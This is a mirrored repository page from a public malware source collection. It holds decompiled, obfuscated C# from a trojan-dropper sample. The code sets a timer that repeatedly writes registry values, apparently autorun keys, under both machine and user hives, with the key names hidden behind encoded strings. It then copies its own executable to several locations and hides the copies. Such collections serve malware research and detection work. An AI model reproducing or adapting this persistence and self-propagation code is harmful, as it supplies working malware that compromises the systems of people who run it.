mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
114 lines
4.2 KiB
C#
114 lines
4.2 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u000F;
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Timers;
|
|||
|
|
|||
|
namespace \u000F
|
|||
|
{
|
|||
|
internal sealed class \u0002
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
private Timer \u0001 = new Timer();
|
|||
|
private RegistryKey \u0001;
|
|||
|
private string \u0001 = Process.GetCurrentProcess().MainModule.FileName;
|
|||
|
|
|||
|
public void \u000F()
|
|||
|
{
|
|||
|
this.\u0001.Interval = (double) (\u000F.\u0001.\u0001.\u0002 * 1000);
|
|||
|
// ISSUE: method pointer
|
|||
|
this.\u0001.Elapsed += new ElapsedEventHandler((object) this, __methodptr(\u000F));
|
|||
|
this.\u0001.Start();
|
|||
|
}
|
|||
|
|
|||
|
private void \u000F([In] object obj0, [In] ElapsedEventArgs obj1)
|
|||
|
{
|
|||
|
if (\u000F.\u0001.\u0001.\u0016)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001 = Registry.LocalMachine.OpenSubKey(\u0002.\u0001(3792), true);
|
|||
|
if (!this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[0]))
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
|
|||
|
else if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[0]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"')
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001 = Registry.LocalMachine.OpenSubKey(\u0002.\u0001(3853), true);
|
|||
|
if (this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[1]))
|
|||
|
{
|
|||
|
if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[1]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"')
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
|
|||
|
}
|
|||
|
else
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001 = Registry.CurrentUser.OpenSubKey(\u0002.\u0001(3792), true);
|
|||
|
if (this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[0]))
|
|||
|
{
|
|||
|
if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[0]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"')
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
|
|||
|
}
|
|||
|
else
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001 = Registry.CurrentUser.OpenSubKey(\u0002.\u0001(3853), true);
|
|||
|
if (this.\u0001.Equals((object) \u000F.\u0001.\u0001.\u0005[1]))
|
|||
|
{
|
|||
|
if (this.\u0001.GetValue(\u000F.\u0001.\u0001.\u0005[1]).ToString() != '"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"')
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
|
|||
|
}
|
|||
|
else
|
|||
|
this.\u0001.SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string str in \u000F.\u0001.\u0001.\u0006)
|
|||
|
{
|
|||
|
if (!\u000F.\u0001.\u0001.\u0010(str))
|
|||
|
{
|
|||
|
File.Copy(this.\u0001, str, true);
|
|||
|
File.SetAttributes(str, FileAttributes.Hidden);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
static \u0002() => \u0003.\u000F();
|
|||
|
}
|
|||
|
}
|